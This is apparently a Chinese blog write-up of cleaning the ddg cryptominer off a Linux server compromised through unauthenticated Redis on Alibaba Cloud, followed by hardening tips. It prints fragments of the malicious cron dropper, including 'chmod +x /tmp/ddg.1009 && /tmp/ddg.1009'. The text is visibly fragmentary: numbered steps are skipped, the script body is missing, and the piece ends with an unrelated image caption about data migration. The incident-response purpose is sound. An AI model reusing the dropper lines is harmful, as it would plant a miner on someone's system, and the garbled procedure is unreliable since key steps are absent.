1、起因:
[root@58 ~]# crontab -e
②、lastb:檢視暴力破解的記錄,發現并沒有異常
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
if [ ! -f "/tmp/ddg.1009" ]; then
fi
chmod +x /tmp/ddg.1009 && /tmp/ddg.1009<code>`</code>
④、ps axu:檢視異常程序
[root@58 ~]# ll /var/spool/cron/crontabs
total 4
-rw-r--r-- 1 root root 62 jun 19 09:35 root
[root@58 ~]# rm -rf /var/spool/cron/crontabs
[root@58 ~]# ll /tmp/ddg.1009
-rwxr-xr-x 1 root root 8890464 jun 18 10:09 /tmp/ddg.1009
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/ddg.1009
[root@58 ~]# ll /tmp/wntkyg.noaes
-rwxr-xr-x 1 root root 1365824 jun 18 10:12 /tmp/wntkyg.noaes
[root@58 ~]# chmod 444 /tmp/wntkyg.noaes
[root@58 ~]# kill -9 13715
[root@58 ~]# kill -9 13796<code>`</code>
⑥、#修改root登陸
3、入侵思考:
①、伺服器的iptable是隻開了ssh的web的端口,且ssh使用密鑰登陸,且沒有發現嘗試登陸的異常;
②、檢視web的日志,沒有發現異常通路,應該是某個軟體的問題?
③、最後确定是redis無驗證挖礦(搜尋了linux ddg.1009),阿裡雲的安全組是允許0.0.0.0的通路的
④、阿裡雲這個0.0.0.0,巨坑啊,應該是某個賤人從其他阿裡雲的機器登陸到redis的,即【阿裡雲的安全組有0.0.0.0的,是可以通路其他不屬于自己的機器】
4、安全調整:
①、伺服器加上iptables的限制,隻允許再用的ip通路
②、redis改成nologin的使用者啟動
③、redis config修改成其他的名稱:【rename-command config "wyl0lft2uhr"】
④、修改redis端口
5、redis修改計劃任務相關指令:
![資料遷移方法資料遷移原則資料遷移之雙寫方案資料遷移之級聯同步方案[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)